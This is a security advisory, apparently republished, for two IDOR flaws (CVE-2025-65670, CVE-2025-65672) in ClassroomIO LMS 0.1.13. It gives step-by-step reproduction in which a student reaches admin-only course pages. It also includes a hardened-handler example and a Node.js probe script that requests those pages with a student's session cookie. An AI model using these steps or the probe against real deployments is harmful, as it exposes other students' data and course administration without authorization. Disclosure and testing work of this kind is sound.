Classroomio LMS 0.1.13 Insecure Direct Object Reference
Classroomio LMS version 0.1.13 suffers from an Insecure Direct Object Reference (IDOR) vulnerability.

This flaw allows an authenticated user to reach data and functions reserved for other roles by changing an object identifier in a URL. In the two reports below, a user enrolled as a student copies the course ID out of a lesson URL and requests the course's admin/teacher-only pages directly (analytics, attendance, submissions, people, marks, share settings and the invite panel), and the application serves them.

The application does not verify, on the server, that the requesting user holds a role in that specific course which entitles them to the object the ID refers to. The result is disclosure of other students' data and of course administration data, and, through the invite panel, a foothold for tampering with course membership. In the first report the data is shown only briefly before the UI moves the student away; that is still a leak, because the server already returned the data and the client-side redirect merely hides it. Administrators should update to a release in which the project has fixed these reports, or enforce authorization on the server for every object reference, before any data for the referenced object is loaded.
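
As an added example (not ClassroomIO's code, nor the researcher's), the following Node.js model shows one ordering mistake that produces this kind of symptom, privileged data handed to the client together with a redirect instruction, next to the server-side check that should run first. The in-memory tables, the role names `admin`/`teacher`/`student` and the handler shapes are assumptions made for the illustration.

```javascript
// Added example, not ClassroomIO code: a minimal model of the "authorize after
// loading" mistake behind a page that shows privileged data and then redirects,
// next to the server-side check that should run first. Tables, roles and the
// handler shapes are assumptions for illustration only.

// Constructed sample data: two courses, one user who is admin of c-1 but only
// a student in c-2 (the case a per-course check must catch).
const courses = {
  'c-1': { title: 'Intro to Security' },
  'c-2': { title: 'Applied Crypto' },
};
const memberships = [
  { userId: 'u-admin', courseId: 'c-1', role: 'admin' },
  { userId: 'u-admin', courseId: 'c-2', role: 'student' },
  { userId: 'u-student', courseId: 'c-1', role: 'student' },
];
const marks = {
  'c-1': [
    { studentId: 'u-student', exercise: 'Quiz 1', score: 7 },
    { studentId: 'u-other', exercise: 'Quiz 1', score: 9 },
  ],
  'c-2': [{ studentId: 'u-admin', exercise: 'Lab 1', score: 5 }],
};

const PRIVILEGED_ROLES = new Set(['admin', 'teacher']);

// Role of a user in one specific course, or null if not enrolled. The lookup is
// keyed on (userId, courseId): being admin of some other course must not count.
function roleInCourse(userId, courseId) {
  const row = memberships.find((m) => m.userId === userId && m.courseId === courseId);
  return row ? row.role : null;
}

// VULNERABLE pattern: the object is loaded by ID first and handed to the client
// together with a "go away" instruction for unauthorized users. Whatever the UI
// does with that instruction, the marks have already left the server.
function marksPageVulnerable(userId, courseId) {
  const data = marks[courseId] ?? [];
  const allowed = PRIVILEGED_ROLES.has(roleInCourse(userId, courseId));
  return {
    status: 200,
    data,
    redirect: allowed ? null : `/courses/${courseId}/lessons`,
  };
}

// HARDENED pattern: authorize the (caller, object) pair before touching the
// object. A denied request carries no object data at all.
function marksPageHardened(userId, courseId) {
  if (!(courseId in courses)) return { status: 404, data: null };
  if (!PRIVILEGED_ROLES.has(roleInCourse(userId, courseId))) {
    return { status: 403, data: null };
  }
  return { status: 200, data: marks[courseId] ?? [] };
}

// Stand-alone demo: a student requesting c-1's marks through both handlers.
console.log('vulnerable:', JSON.stringify(marksPageVulnerable('u-student', 'c-1')));
console.log('hardened:  ', JSON.stringify(marksPageHardened('u-student', 'c-1')));
```

The point of the hardened variant is the order of operations: the membership check uses the course ID from the request, not a global "is this user an admin" flag, and it runs before the marks are read, so a denied response cannot carry anything to hide.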

# CVE-2025-65670
An Insecure Direct Object Reference (IDOR) in classroomio 0.1.13 allows students to access sensitive admin/teacher endpoints by manipulating course IDs in URLs, resulting in unauthorized disclosure of sensitive course, admin, and student data. The leak occurs momentarily before the system reverts to a normal state restricting access. Discovered by Rivek Raj Tamang (RivuDon), Sikkim, India.

**Affected Product: ClassroomIO**
* Affected Version: 0.1.13
* **Discovered by: Rivek Raj Tamang (RivuDon), Sikkim, India**

## Vulnerability Details
Insecure Direct Object Reference / Broken Access Control

## Summary
This vulnerability allows a student-level user to momentarily access privileged admin-only endpoints by directly manipulating course IDs in the URL. Due to missing authorization checks and improper access validation, sensitive course analytics, attendance records, submissions, people lists, and marks become exposed before the system reverts to enforcing restrictions. This brief but critical information disclosure constitutes an IDOR-based Broken Access Control issue and can lead to leakage of sensitive administrative and student data.

## Steps to Reproduce

Login as Admin

1. Create and publish a course with enrolled students.

2. Access the admin endpoints for the course, e.g.:

   courses/<course-ID>/analytics
   courses/<course-ID>/attendance
   courses/<course-ID>/submissions
   courses/<course-ID>/people
   courses/<course-ID>/marks

3. Admin can view the expected data.

Login as Student

4. Join the course via Explore.

5. Verify that the student does not see the admin pages in the UI.

6. Find the course ID (e.g. by inspecting a course lesson URL).

7. Manually access the admin endpoints by crafting URLs such as:

   courses/<course-ID>/analytics
   courses/<course-ID>/attendance
   courses/<course-ID>/submissions
   courses/<course-ID>/people
   courses/<course-ID>/marks

8. The system momentarily responds with data meant only for Admin/Teacher roles, leaking sensitive information before reverting to restricting access. Because the data reached the browser, it can be captured from the network tab or an intercepting proxy regardless of the redirect that follows.



## Acknowledgement

This vulnerability was discovered and responsibly reported by:

**Rivek Raj Tamang (RivuDon) from Sikkim, India**

https://www.linkedin.com/in/rivektamang/

https://rivudon.medium.com/


-------------------

# CVE-2025-65672
Insecure Direct Object Reference (IDOR) in classroomio 0.1.13 allows unauthorized share and invite access to course settings.

**Affected Product: ClassroomIO**
* Affected Version: 0.1.13
* **Discovered by: Rivek Raj Tamang (RivuDon), Sikkim, India**

## Vulnerability Details
Insecure Direct Object Reference (IDOR) / Broken Access Control

## Summary
ClassroomIO version 0.1.13 contains an IDOR vulnerability that allows a student (non-privileged user) to access restricted Course Settings, specifically the Share and Invite management interfaces.
This flaw arises due to improper authorization checks on sensitive endpoints, enabling privilege escalation and unauthorized course manipulation.

## Steps to Reproduce

1. Create Course (Admin)

   Log in as an Admin and create/publish a new course.

2. Student View

   Log in as a Student.

   Navigate to the course using the Explore page.

   Note the course ID in the URL.

3. Access Restricted Pages Directly

   Replace {course-id} with a valid course ID and visit:

   /courses/{course-id}/settings#share

   /courses/{course-id}/people?add=true

   Note that the `#share` fragment is never sent to the server; the request it sees is `/courses/{course-id}/settings`, and the fragment presumably only selects the Share tab client-side. The access-control failure is that the settings page itself, and the people page with `?add=true`, are served to a student at all.

4. Observe the Impact

   The student is able to access:

   Share Settings

   Invite/People Management Panel

   These actions are meant only for the course admin, but due to missing access checks, the student gains unauthorized control.
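
As an added example serving the reproduction steps of both CVE-2025-65670 and CVE-2025-65672 above (not the researcher's or the project's code), this Node.js script requests each listed path with a student session and judges the server's response rather than what the UI ends up showing. It assumes a ClassroomIO base URL, a Cookie header copied from the student's browser session, and that a leaked page can be recognised by strings only an admin view should contain; the marker strings, argument names and the `probe.js` filename are placeholders to adapt to the deployment.

```javascript
// Added example, not ClassroomIO code: probe the admin-only course paths from
// both reports with a student session and judge the *server's* response rather
// than what the UI ends up showing. Base URL, cookie and markers are assumptions.

// Paths from the two reports, relative to the instance root.
const ADMIN_PATHS = [
  'courses/{course-id}/analytics',
  'courses/{course-id}/attendance',
  'courses/{course-id}/submissions',
  'courses/{course-id}/people',
  'courses/{course-id}/marks',
  'courses/{course-id}/settings#share',
  'courses/{course-id}/people?add=true',
];

// Absolute URLs for one course ID. encodeURIComponent keeps a crafted ID from
// escaping its path segment.
function buildAdminUrls(baseUrl, courseId) {
  const base = baseUrl.endsWith('/') ? baseUrl : baseUrl + '/';
  return ADMIN_PATHS.map(
    (p) => new URL(p.replace('{course-id}', encodeURIComponent(courseId)), base).href,
  );
}

// What the server actually receives: path and query, never the fragment.
// '/courses/x/settings#share' reaches the server as '/courses/x/settings'.
function serverVisiblePath(url) {
  const u = new URL(url);
  return u.pathname + u.search;
}

// Verdict for one response. A client-side redirect that fires after the page
// rendered does not change the verdict: the data was already sent.
function classify(status, body, markers) {
  const hits = markers.filter((m) => body.includes(m));
  if (status === 401 || status === 403) return { verdict: 'DENIED', hits };
  if (status >= 300 && status < 400) return { verdict: 'DENIED', hits }; // server-side redirect, no page served
  if (status === 200 && hits.length > 0) return { verdict: 'LEAK', hits };
  if (status === 200) return { verdict: 'NO_MARKER', hits }; // shell page; data may arrive by a follow-up request
  return { verdict: 'UNEXPECTED', hits };
}

// Fetch each path with the student's cookie; redirect: 'manual' so a 3xx is
// reported as such instead of being followed to wherever the app sends students.
async function probe(baseUrl, courseId, cookie, markers) {
  const results = [];
  for (const url of buildAdminUrls(baseUrl, courseId)) {
    const res = await fetch(url, { headers: { cookie }, redirect: 'manual' });
    const body = await res.text();
    results.push({ path: serverVisiblePath(url), status: res.status, ...classify(res.status, body, markers) });
  }
  return results;
}

// Usage (names illustrative):
//   node probe.js https://lms.example <course-id> '<Cookie header from the student session>' marker1 marker2
const [argBase, argCourse, argCookie, ...argMarkers] = process.argv.slice(2);
if (argBase && argCourse && argCookie) {
  probe(argBase, argCourse, argCookie, argMarkers).then((rows) => console.table(rows));
}
```

If a path comes back as NO_MARKER, the HTML is only an application shell and the protected data is loaded by a follow-up request from the browser; in that case replay that follow-up request (visible in the network tab or proxy) with the student's session token, since that is the request whose authorization actually matters.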

## Acknowledgement

This vulnerability was discovered and responsibly reported by:

**Rivek Raj Tamang (RivuDon) from Sikkim, India**

https://www.linkedin.com/in/rivektamang/

https://rivudon.medium.com/
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸